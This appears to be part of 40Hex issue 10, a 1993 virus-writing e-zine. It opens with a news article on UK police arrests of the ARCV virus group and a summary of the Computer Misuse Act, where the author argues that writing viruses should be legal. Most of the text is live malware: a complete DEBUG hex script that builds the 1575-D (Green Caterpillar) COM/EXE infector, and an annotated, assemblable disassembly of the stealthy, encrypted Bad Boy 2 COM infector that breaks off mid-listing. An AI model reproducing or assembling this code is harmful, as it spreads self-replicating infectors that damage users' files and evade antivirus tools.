40Hex Number 10 Volume 3 Issue 1
40Hex Issue 10 Volume 3 Number 1 File 004
ARCV Busted!
by DecimatoR
Many of you who read this mag know of the ARCV, and most likely
know Apache Warrior, the president of the group. In December and January,
the ARCV members were raided by Scotland Yard officials, and had their
computer equipment confiscated. Apparently, the bust was triggered not because
of the virus writing they did, but because of the method they allegedly used to
transport their creations to their friends in other countries. A contact in
England recently filled me in on the events which led to the bust of the ARCV.
Apparently, a few of the ARCV members were calling long distance by use of a
beige box (a device which allows tapping into phone lines to make unauthorized
calls) and they got caught. This led to the confiscation of their computer
equipment. The two who were arrested apparently cooperated with the police,
and further examination of the confiscated equipment proved that not only had
the police caught people making fraudulent phone calls, but they also caught
the leaders of a large virus writing group. Further investigation resulted in
more arrests of other ARCV members. Had the group not been phreaking their
calls, chances are they would not be in the fix they are today. Please note,
however, that there have not yet been any trials in the arrests, and the ARCV
members have not been proven guilty.
The following articles were posted on UseNet, and tell the story, although all
but one fail to mention the fact that illegal phone calls, and NOT virus
writing was the key factor in the arrests. Only after the first arrests were
made did the police pursue the avenue concerning virus authorship.
--------------
From "Computing", Feb 4, 1993:
Apache scalps virus cowboys
"Police raided the homes of suspected computer virus authors across
the country last week, arresting five people and seizing equipment.
"The raids were carried out last Wednesdau by police in Manchester,
Cumbria, Staffordshire and Devon and Cornwall.
"Scotland Yard's computer crimes unit co-ordinated the raids under the
codename Operation Apache.
" A spokeswoman for the Greater Manchester Police said: 'The
investigation began in the Mancheter area following the arrest of the
self-styled president of the virus writing group in Salford last
December.'
"Police would not reveal the man's name, but said he had been released
on bail.
"Last week's raids led to the the arrest of a further two people in
Manchester. Three other suspects were also arrested in Staffordshire,
Cumbria and Cornwall.
"PCs and floppy disks were seized in all the raids.
"All those arrested have been released on police bail pending further
investigations."
--------------
From the EFF.TALK newsgroup of Usenet:
"Police have arrested Britain's first computer virus-writing group
in an operation they hope will dampen the aspirations of any potential
high-tech criminals.
Four members of the Association of Really Cruel Viruses (ARCV) were
raided last Wednesday in a joint operation in four cities co-ordinated by
Scotland Yard's computer crimes unit.
The arrests in Greater Manchester, Cumbria, Staffordshire and
Devon and Cornwall, bring to six the members of the group that have been
tracked down by police. Two others, also writing for ARCV, were arrested
a month ago in Manchester.
This six are thought to have written between 30 and 50 relatively
harmless viruses....
--------------
From a reposting of an unidentified newspaper, dated 4 February 1993:
UK Virus Writers Group Foiled by Scotland Yard
British police have arrested four members of a virus-writing group that
calls itself the Association of Really Cruel Viruses (ARCV).
The Scotland Yard Computer Crime Unit coordinated the raids carried out
on suspects in Greater Manchester, Staffordshire, Devon, and Cornwall.
The arrests last Wednesday, January 27, bring to six the number of ARCV
members found by police, after they initially arrested one caught
"phreaking" in Manchester in December. ("Phone phreaking" is the illegal
practice of obtaining free use of telephone lines.) The arrests were
made under Section 3 of the Computer Misuse Act, which prohibits
unauthorized modification of computer material, said Detective Sergeant
Stephen Littler. The suspects, who cannot be identified at this stage
under British law, have been released on bail pending inquiries and may
face further charges.
The members of ARCV used PCs to write viruses, which they shared via a
bulletin board operated by one suspect in Cornwall. The police
confiscated hardware and software, which is being studied by virus
experts to determine how many viruses were written and what the viruses
were intended to do, Littler said. The British anti-virus community
became aware of ARCV through the group's own publicity efforts, such as
a newsletter that it had uploaded to various bulletin boards in the
U.S., according to Richard Ford, editor of the monthly "Virus Bulletin,"
which is published in Abingdon, Oxon, England. The newsletter was
described in detail in the November, 1992, issue of "Virus Bulletin."
"To the best of my knowledge, none of their viruses are in the wild, out
there spreading," said Ford. "But they have been found on virus
exchange bulletin board services, and we've had reports of them being
uploaded rather widely in the UK." ARCV claims, in its newsletter, to
have links with PHALCON/SKISM in the U.S. and other virus writers in
Eastern Europe. "The world is a very small place when you've got a
modem, or are on the Internet," Ford said. The newsletter invites new
members to join even if they are not virus writers but prefer other
"underground" activities such as hacking and phreaking. It also betrays
ARCV's fears of being perceived as nerds (a term not used in Britain)
saying, "Now the picture put out by the Anti- Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak
even if dead." (Anorak is the British word for ski jacket.)
ARCV has already failed at one of the objectives mentioned in its
premier newsletter issue, which said, "We will be dodging Special Branch
and New Scotland Yard as we go."
--------------
The following is a summary of Britain's Computer Misuse Act 1990, which
deals with computer crimes:
Summary of Computer Misuse Act 1990:
{ heading }
...
1 -(1) A person is guilty of an offence if-
(A) he causes a computer to perform any function with intent to secure
access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the
function that that is the case.
(2) The intent a person has to have to commit an offence under this secton
need not be directed at -
(a) any particular program or data;
(b) a program or data of any particular kind; or
(c) a program or data held in any particular computer.
{ up to 6 months prison, or a medium scale - level 5 - fine, or both}
2 {similar - but access with intent to commit or facilitate further offnces}
3 -(1) A person is guilty of an offence if-
(a) he does any act which causes an unauthorised modification of the contents
of any computer; and
(b) at the time when he does the act he has the requisite intent and the
requisite knowledge.
(2) For the purposes of subsection (1)(b) above the requisite is an intent
to cause a modification of the contents of any computer and by so doing-
(a) to impair the operation of any computer;
(b) to prevent or hinder access to any program or data held in any comp
(c) to impair the operation of any such program or the reliability of
any such data.
(3) {similar clause on direction of intent to section 1}
(4) For the purposes of subsection (1)(b) above the requisite knowledge
is knowledge that any modification he intends to cause is unauthorised.
(5) It is immaterial for the purposes of this section whether an
unauthorised modification or any intended effect of it of a kind
mentioned in subsection (2) above is, or is intended to be, permanent
or merely temporary.
{ such damage not to be within the terms of the Criminal Damage Act 1971 unless
physical damage is caused }
{ In magistrates court - up to 6 months prison or maximum fine or both}
{ In Crown court up to 5 years prison and/or unlimited fine}
{ sections on Jurisdiction - Act applies as long as there is a significant
UK connection - either accused or target computer was in UK}
{ lots of further legal details - no way am I typing in all that!}
14. { search warrant to be issued by a judge, not just a magistrate}
15. { Extradition attempts possible for offences unders sections 2 or 3
conspiracy to commit such, or attempt to commit section 3 offence}
{ more verbiage}
17. {lots of definitions - Computer is _not_ formally defined anywhere
in English Law}
{Definition of Access - seems to cover anything you could think of
doing with a computer}
{defiitions of unauthorised - again rather wide}
{ ... }
(10) Refences to a program include refences to part of a program.
--------------
There ya have it. I personally would like to wish Apache Warrior, Ice-9,
and the rest of ARCV luck in the upcoming legal mess they face. I was sorry
to hear about the bust of the group, but even sorrier when I found out that
some of the members were arrested solely because they had a hand in virus
production. When you commit fraud, you are breaking the law, and yes, you
should be held accountable for your actions. I tend to have the opposite
point of view when it comes to authoring a virus, however. Simply writing code
should never be illegal. Spreading, yes, but writing? No. Unfortunately, the
"powers that be" don't always see it as I do.
--DecimatoR
40Hex Issue 10 Volume 3 Number 1 File 005
This is the 1575-D, or Green Caterpillar virus. This resident COM and EXE
infector is so named for the little green caterpillar which will occasionally
crawl across the screen and eat up characters as it goes along. It is
otherwise unremarkable.
-------------------------------------------------------------------------------
n 1575-d.com
e 0100 0E 8C C8 05 3F 00 50 B8 00 01 50 CB 00 00 00 00
e 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04E0 00 00 00 00 00 00 00 00 8B 07 2E FF 36 F8 07 2E
e 04F0 EB 4A 90 60 14 34 02 53 FF 00 F0 CD 20 00 00 00
e 0500 00 00 00 00 00 00 00 7E A4 0A 03 00 01 00 00 00
e 0510 01 0A 03 00 00 9C 0E 00 00 60 36 05 00 AA 43 B5
e 0520 9A 97 03 00 40 89 0E B4 0D 7A 04 71 EA 56 34 02
e 0530 00 00 00 00 78 F8 00 F0 5C 07 70 00 06 1E 8C C0
e 0540 0E 1F 0E 07 A3 35 01 8C D0 A3 2B 01 B0 02 E6 20
e 0550 FC 33 C0 8E D8 33 F6 BF 3C 01 B9 10 00 F2 A4 1E
e 0560 17 BD 08 00 87 EC E8 4C 00 E9 C6 03 E8 5D 04 E8
e 0570 AB 00 74 0E A0 24 07 50 E8 13 01 58 A2 24 07 EB
e 0580 13 90 E8 76 02 E8 95 02 80 3E 24 07 00 75 05 B8
e 0590 00 4C CD 21 80 3E 24 07 43 75 31 1F 07 0E 1F 07
e 05A0 06 BF 00 01 BE 0B 01 B9 0C 00 F2 A4 06 1F B8 00
e 05B0 01 50 33 C0 CB BE 06 00 AD 3D 92 01 74 DD 3D 79
e 05C0 01 75 03 E9 A9 00 3D DC 01 74 01 C3 1F 07 2E 8B
e 05D0 1E 19 01 2E 2B 1E 31 01 8C C8 2B C3 8E D0 2E 8B
e 05E0 2E 33 01 87 EC 2E 8B 1E 21 01 2E 2B 1E 23 01 8C
e 05F0 C8 2B C3 50 2E A1 25 01 50 CB 23 1A 3C 23 2F 2D
e 0600 2D 21 2E 24 0E 23 2F 2D E0 41 3A 31 35 37 35 2D
e 0610 44 2E 43 4F 4D 00 00 00 24 24 24 24 24 B8 02 3D
e 0620 BA 19 02 CD 21 73 02 F8 C3 A3 2B 01 BA 73 06 B8
e 0630 24 25 CD 21 B8 02 42 8B 1E 2B 01 B9 FF FF BA FE
e 0640 FF CD 21 BA 7D 02 B4 3F 8B 1E 2B 01 B9 02 00 CD
e 0650 21 B4 3E CD 21 1E 8B 16 39 01 A1 37 01 8E D8 B8
e 0660 24 25 CD 21 1F 81 3E 7D 02 0C 0A F8 C3 00 00 3D
e 0670 2D 02 74 1A 1E 07 0E 1F A1 2B 01 8E D0 87 EC BE
e 0680 3C 01 BF 00 00 B9 10 00 FC F2 A4 E9 DE FE B0 43
e 0690 A2 24 07 B0 08 E6 70 E4 71 A2 3B 01 BA 19 02 B8
e 06A0 02 3D CD 21 73 01 C3 A3 2B 01 BA 0B 01 8B 1E 2B
e 06B0 01 B9 0C 00 B4 3F CD 21 B8 02 42 33 C9 33 D2 CD
e 06C0 21 50 05 10 00 25 F0 FF 50 D1 E8 D1 E8 D1 E8 D1
e 06D0 E8 BF 1F 03 AB 58 5B 2B C3 B9 27 06 03 C8 BA 00
e 06E0 01 2B D0 8B 1E 2B 01 B4 40 CD 21 B8 00 42 33 C9
e 06F0 33 D2 CD 21 B4 40 8B 1E 2B 01 B9 0C 00 BA 1B 03
e 0700 CD 21 B4 3E 8B 1E 2B 01 CD 21 C3 0E 8C C8 05 3F
e 0710 00 50 B8 00 01 50 CB B0 45 A2 24 07 B0 08 E6 70
e 0720 E4 71 A2 3B 01 BA 19 02 B8 02 3D CD 21 73 01 C3
e 0730 A3 2B 01 BA 0B 01 8B 1E 2B 01 B9 18 00 B4 3F CD
e 0740 21 B8 02 42 B9 00 00 BA 00 00 CD 21 50 05 10 00
e 0750 83 D2 00 25 F0 FF 89 16 27 01 A3 29 01 B9 27 07
e 0760 81 E9 00 01 03 C1 83 D2 00 B9 00 02 F7 F1 40 A3
e 0770 0F 01 89 16 0D 01 A1 21 01 A3 23 01 A1 1F 01 A3
e 0780 25 01 A1 19 01 A3 31 01 A1 1B 01 A3 33 01 8B 16
e 0790 27 01 A1 29 01 B9 10 00 F7 F1 2D 10 00 2B 06 13
e 07A0 01 A3 21 01 A3 19 01 C7 06 1F 01 00 01 C7 06 1B
e 07B0 01 00 01 B8 00 42 33 C9 BA 02 00 CD 21 BA 0D 01
e 07C0 8B 1E 2B 01 B9 16 00 B4 40 CD 21 B8 02 42 33 C9
e 07D0 33 D2 CD 21 BA 00 01 A1 29 01 59 2B C1 2B D0 B9
e 07E0 27 07 03 C8 81 E9 00 01 B4 40 CD 21 B4 3E CD 21
e 07F0 C3 51 B9 00 00 B4 4E CD 21 59 C3 06 B8 1C 35 CD
e 0800 21 2E 89 1E 07 01 2E 8C 06 09 01 B8 21 35 CD 21
e 0810 06 58 2E A3 05 01 2E 89 1E 03 01 07 C3 50 06 1E
e 0820 33 C0 8E C0 BE 86 00 26 8B 04 8E D8 BE 25 07 81
e 0830 3C 0C 0A 75 09 1E 58 E8 B7 01 1F 07 58 C3 0E 1F
e 0840 A1 35 01 48 8E C0 26 80 3E 00 00 5A 74 03 EB 44
e 0850 90 26 A1 03 00 B9 37 07 D1 E9 D1 E9 D1 E9 D1 E9
e 0860 2B C1 72 30 26 A3 03 00 26 29 0E 12 00 0E 1F 26
e 0870 A1 12 00 50 07 BE 00 01 56 5F B9 27 06 FC F2 A4
e 0880 06 2B C0 8E C0 BE 84 00 BA A8 04 26 89 14 46 46
e 0890 58 26 89 04 1F 07 58 C3 3C 57 75 03 EB 1E 90 80
e 08A0 FC 1A 75 06 E8 17 01 EB 13 90 80 FC 11 75 04 E8
e 08B0 0F 00 CF 80 FC 12 75 04 E8 C1 00 CF 2E FF 2E 03
e 08C0 01 B0 57 CD 21 50 51 52 53 55 56 57 1E 06 0E 1F
e 08D0 0E 07 2E C6 06 CD 05 00 90 E8 18 00 75 0C E8 3C
e 08E0 FD 74 07 E8 54 01 FE 0E CD 05 07 1F 5F 5E 5D 5B
e 08F0 5A 59 58 C3 0E 07 0E 07 FC E8 36 00 73 04 83 FF
e 0900 00 C3 BF 19 02 B0 2E B9 0B 00 F2 AE 81 3D 43 4F
e 0910 75 0D 80 7D 02 4D 75 07 C6 06 24 07 43 90 C3 81
e 0920 3D 45 58 75 0C 80 7D 02 45 75 06 C6 06 24 07 45
e 0930 90 C3 1E 2E 8B 36 2D 01 2E A1 2F 01 8E D8 BF 19
e 0940 02 AC 3C FF 75 07 83 C6 06 AC EB 08 90 3C 05 72
e 0950 03 1F F9 C3 B9 0B 00 3C 00 74 06 04 40 AA B0 3A
e 0960 AA AC 3C 20 74 04 AA EB 0B 90 26 80 7D FF 2E 74
e 0970 03 B0 2E AA E2 EB B0 00 AA 1F F8 C3 B0 57 CD 21
e 0980 50 51 52 53 55 56 57 1E 06 0E 1F 0E 07 2E 80 3E
e 0990 CD 05 00 74 03 EB 1C 90 E8 59 FF 75 16 E8 7D FC
e 09A0 74 11 E8 95 00 FE 0E CD 05 07 1F 5F 5E 5D 5B 5A
e 09B0 59 58 C3 07 1F 5F 5E 5D 5B 5A 59 58 C3 00 50 1E
e 09C0 58 2E A3 2F 01 2E 89 16 2D 01 58 C3 0E B0 00 E6
e 09D0 20 B8 24 35 CD 21 89 1E 39 01 8C C3 89 1E 37 01
e 09E0 07 BE 0A 02 BF 19 02 B9 0F 00 AC 04 20 AA E2 FA
e 09F0 C3 50 0E 1F 0E 07 8A 1E 3B 01 80 FB 0C 77 39 80
e 0A00 FB 00 74 34 B0 08 E6 70 E4 71 3C 0C 77 2A 3C 00
e 0A10 74 26 3A C3 74 22 FE C3 E8 14 00 3A C3 74 19 FE
e 0A20 C3 E8 0B 00 3A C3 74 10 1F E8 3A 00 0E 1F C3 80
e 0A30 FB 0C 76 03 80 EB 0C C3 58 C3 BA 73 06 B8 24 25
e 0A40 CD 21 80 3E 24 07 43 75 06 E8 42 FC EB 04 90 E8
e 0A50 C5 FC 1E 8B 16 39 01 A1 37 01 8E D8 B8 24 25 CD
e 0A60 21 1F C3 B0 03 CF BA B0 06 B8 1C 25 CD 21 C6 06
e 0A70 B0 06 90 90 B8 00 B8 8E C0 BF A0 0F B8 20 07 B9
e 0A80 0B 00 F2 AB 0E 07 C3 00 00 00 20 07 0F 0A 0F 0A
e 0A90 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A F7 0E EE 0C
e 0AA0 90 FB 50 51 52 53 55 56 57 1E 06 0E 1F EB 0B 90
e 0AB0 07 1F 5F 5E 5D 5B 5A 59 58 CF B8 00 B8 8E C0 E8
e 0AC0 2B 00 BE 9A 06 B9 16 00 F2 A4 80 3E AE 06 EE 74
e 0AD0 08 C6 06 AE 06 EE EB 06 90 C6 06 AE 06 F0 26 8B
e 0AE0 05 B4 0E A3 9A 06 C6 06 99 06 00 EB C3 BF 00 00
e 0AF0 BE 9C 06 57 B9 12 00 FC F3 A6 5F 74 0B 47 47 81
e 0B00 FF A0 0F 75 EB BF 00 00 81 FF 9E 0F 75 05 C6 06
e 0B10 B0 06 CF C3 43 0C 0A
rcx
0A17
w
q
-------------------------------------------------------------------------------
DA
40Hex Issue 10 Volume 3 Number 1 File 006
The following is the Bad Boy 2 virus. Patricia M. Hoffman's VSUM is clearly
not a good source of virus description, so we will not bother including its
utterly useless description of the virus here. Bad Boy 2 is a resident COM
infector. After 10 infections, it turns itself off. Although most of the
code is written well, there are still a few bugs and inconsistencies in it.
It implements several well-known stealth techniques, including playing with
the system file table. It is a segmented virus, with variable placement of
each segment when it infects a file. Thus the locations of each segment in
the virus relative to each other changes upon each infection.
For a byte-to-byte match up of the original, assemble with the following:
tasm badboy2.asm
tlink /t badboy2.asm
Note only one pass is required.
Dark Angel
Phalcon/Skism 1993
-------------------------------------------------------------------------------
.model tiny
.code
org 100h
; Bad Boy 2 virus
; Disassembly done by Dark Angel of Phalcon/Skism
; For 40Hex Issue 10 Volume 3 Number 1
start:
push cs:startviruspointer ; save on stack for
push cs ; return
pop ds
jmp word ptr cs:encryptpointer ; decrypt virus
endstart:
curpointer dw 0
infcounter db 0
filesize dw 2
filetime dw 0
filedate dw 0
origint21 dw 0, 0
DOSdiskOFF dw 0
DOSdiskSEG dw 0
oldint21 dw 0, 0
oldint24 dw 0, 0
; The parts of the virus are here
encryptpointer dw offset carrierencrypt
startviruspointer dw offset startvirus
installpointer dw offset install
exitviruspointer dw offset exitvirus
restoreint21pointer dw offset restoreint21
int24pointer dw offset int24
int21pointer dw offset int21
infectpointer dw offset infect
encryptlength dw endencrypt-encrypt
startviruslength dw endstartvirus-startvirus
installlength dw endinstall-install
exitviruslength dw endexitvirus-exitvirus
restoreint21length dw endrestoreint21-restoreint21
int24length dw endint24-int24
int21length dw endint21-int21
infectlength dw endinfect-infect
enddata:
encrypt: ; and decrypt
mov bx,offset startviruspointer
mov cx,6
do_next_segment:
cmp bx,offset int24pointer
jne not_int24pointer
add bx,2
not_int24pointer:
push bx
push cx
mov ax,[bx] ; get start offset
mov cx,[bx+encryptlength-encryptpointer] ; and length
mov bx,ax
encrypt_segment:
xor [bx],al ; encrypt cx bytes
inc bx
loop encrypt_segment
pop cx
pop bx
add bx,2 ; go to next segment
loop do_next_segment
retn
endencrypt:
startvirus:
mov es,cs:[2] ; get top of memory
mov di,100h ; check if virus
mov si,100h ; already resident
mov cx,offset endstart - offset start - 1
rep cmpsb
jnz not_installed ; continue if not
jmp cs:exitviruspointer ; otherwise, quit
not_installed:
mov ax,cs ; get current program's
dec ax ; MCB
mov ds,ax
cmp byte ptr ds:[0],'Z' ; check if last one
;nop
je is_last_MCB ; continue if so
jmp cs:exitviruspointer ; otherwise, quit
is_last_MCB:
rsize = ((endvirus - start + 15)/16+1)*3 ; resident size in
; paragraphs
sub word ptr ds:[3],rsize ; decrease MCB's memory
mov ax,es ; get segment of high memory
sub ax,rsize ; decrease by virus size
mov es,ax ; es = start segment of virus
mov ds:[12h],ax ; put value in PSP top of
; memory field
push cs
pop ds
mov cs:infcounter,0 ; clear infection counter
mov di,100h
mov cx,offset enddata - offset start
mov si,100h
rep movsb
mov bx,cs:encryptpointer
add bx,encrypt_segment-encrypt+1
xor byte ptr [bx],18h ; change to: xor [bx],bl
; shuffling segments to different locations
mov cx,8
mov curpointer,offset encrypt
shuffle:
push cx
call random_segment
push bx
mov ax,[bx]
push ax
add bx,encryptlength-encryptpointer
mov cx,[bx]
pop si
pop bx
xchg di,curpointer
mov es:[bx],di ; copy segment
rep movsb ; to memory area
xchg di,curpointer
mov ax,8000h
or [bx],ax ; mark already copied
pop cx
loop shuffle
mov cl,8
not ax ; ax = 7FFFh
mov bx,offset encryptpointer
clear_hibit: ; restore the pointers
and [bx],ax
add bx,2
loop clear_hibit
jmp cs:installpointer
random_segment:
push cx
push es
xor cx,cx
mov es,cx
random_segment_loop:
mov bx,es:[46Ch] ; get timer ticks since
; midnight MOD 8
db 081h,0e3h,7,0 ; and bx,7
shl bx,1 ; multiply by 2
add bx,offset encryptpointer
test word ptr [bx],8000h ; check if already moved
jnz random_segment_loop ; do it again if so
pop es
pop cx
retn
endstartvirus:
install:
xor ax,ax
mov ds,ax ; ds->interrupt table
mov ax,ds:21h*4 ; save old int 21h handler
mov es:oldint21,ax
mov ax,ds:21h*4+2
mov word ptr es:oldint21+2,ax
mov ah,30h ; get DOS version
int 21h
cmp ax,1E03h ; 3.X?
jne not_DOS_3X ; skip if not
mov es:origint21,1460h ; use known value for int 21h
mov ax,1203h ; get DOS segment
push ds
int 2Fh
mov word ptr es:origint21+2,ds
pop ds
jmp short is_DOS_3X
nop
not_DOS_3X:
mov ax,ds:21h*4
mov es:origint21,ax
mov ax,ds:21h*4+2
mov word ptr es:origint21+2,ax
is_DOS_3X:
cli ; set new int 21h handler
mov ax,es:int21pointer
mov ds:21h*4,ax
mov ax,es
mov ds:21h*4+2,ax
sti
mov cx,es
mov ah,13h ; get old DOS disk handler
int 2Fh ; to es:bx
push es
mov es,cx
mov es:DOSdiskOFF,dx
mov es:DOSdiskSEG,ds
pop es
int 2Fh ; restore DOS disk handler
jmp cs:exitviruspointer
endinstall:
exitvirus:
push cs ; copy return routine to
push cs ; buffer at end of file
pop ds ; and transfer control
pop es ; to it
mov si,cs:exitviruspointer
add si,offset return_to_COM - offset exitvirus
;nop
mov di,cs:filesize
add di,offset endvirus
push di
mov cx,offset end_return_to_COM - offset return_to_COM
cld
rep movsb
retn ; jmp to return_to_COM
return_to_COM:
mov si,cs:filesize
add si,100h
cmp si,offset endvirus ; check if small file
jae not_negative ; if not, skip next
mov si,offset endvirus ; adjust for too small
not_negative:
mov di,100h
mov cx,offset endvirus - offset start - 1 ; ????
rep movsb ; copy old file to start
mov ax,100h ; and exit the virus
push ax
retn
end_return_to_COM:
endexitvirus:
restoreint21:
xor di,di
mov ds,di
cli
mov di,cs:oldint21
mov ds:21h*4,di
mov di,word ptr cs:oldint21+2
mov ds:21h*4+2,di
sti
retn
plea db 'Make me better!'
endrestoreint21:
int24:
mov al,3
iret
message db 'The Bad Boy virus, Version 2.0, Copyright (C) 1991.',0
endint24:
int21:
push bx
push si
push di
push es
push ax
cmp ax,4B00h ; check if execute
jz execute ; continue if so
jmp short exitint21
nop
execute:
push ds
push cs
pop es
xor ax,ax
mov ds,ax
mov si,24h*4 ; get old int 24h
mov di,offset oldint24 ; handler
movsw
movsw
mov ax,cs:int24pointer
cli ; set new critical error
mov ds:24h*4,ax ; handler
mov ax,cs
mov ds:24h*4+2,ax
sti
pop ds
mov ax,3D00h ; open file read only
pushf
call dword ptr cs:oldint21
jc restore_exitint21
mov bx,ax ; handle to bx
call cs:infectpointer
pushf
mov ah,3eh ; close file
pushf
call dword ptr cs:oldint21
popf
jc restore_exitint21
push ds
cli ; subvert nasty disk
xor ax,ax ; monitoring programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
restore_exitint21:
push ds
xor ax,ax
mov ds,ax
mov ax,cs:oldint24
mov ds:24h*4,ax
mov ax,word ptr cs:oldint24+2
mov ds:24h*4+2,ax
pop ds
exitint21:
pop ax
pop es
pop di
pop si
pop bx
jmp dword ptr cs:oldint21
endint21:
infect:
push cx
push dx
push ds
push es
push di
push bp
push bx
mov ax,1220h ; get JFT entry for file
int 2Fh ; handle bx
mov bl,es:[di]
xor bh,bh
mov ax,1216h ; get associated SFT
int 2Fh ; entry to es:di
pop bx
mov ax,es:[di+11h] ; get file size
cmp ax,0F000h ; exit if too large
jb not_too_large
jmp errorinfect
not_too_large:
mov word ptr es:[di+2],2 ; set to read/write mode
mov ax,es:[di+11h] ; get file size (again)
mov cs:filesize,ax ; save it
mov ax,es:[di+0Dh] ; get file time
mov cs:filetime,ax ; save it
mov ax,es:[di+0Fh] ; get file date
mov cs:filedate,ax ; save it
push cs
pop ds
mov dx,4E9h
mov cx,3E8h
mov ah,3Fh ; Read from file
pushf
call dword ptr cs:oldint21
jnc read_ok
jmp errorinfect
read_ok:
mov bp,ax
mov si,dx
mov ax,'MZ' ; check if EXE
cmp ax,[si]
jne not_MZ
jmp errorinfect
not_MZ:
xchg ah,al
cmp ax,[si] ; check if EXE
jne not_ZM
jmp errorinfect
not_ZM:
push es
push di
push cs
pop es
mov si,100h ; check if already
mov di,dx ; infected
mov cx,offset endstart - offset start - 1
repe cmpsb
pop di
pop es
jnz not_already_infected
jmp errorinfect
not_already_infected:
mov word ptr es:[di+15h],0
push es
push di
mov si,cs:infectpointer
add si,offset write_virus - offset infect
xor di,di
push cs
pop es
mov cx,offset end_write_virus-offset write_virus
cld
rep movsb
pop di
pop es
mov si,cs:infectpointer
add si,offset finish_infect - offset infect
push si
xor si,si
push si
push ds
cli ; subvert nasty
xor ax,ax ; antivirus programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
retn
write_virus:
push bx
call cs:encryptpointer ; encrypt virus
pop bx
mov dx,100h
mov ah,40h ; write virus
mov cx,offset endvirus - offset start
pushf
call dword ptr cs:origint21
pushf
push bx
call cs:encryptpointer ; decrypt virus
pop bx
popf
jnc write_OK
pop ax
mov ax,cs:infectpointer
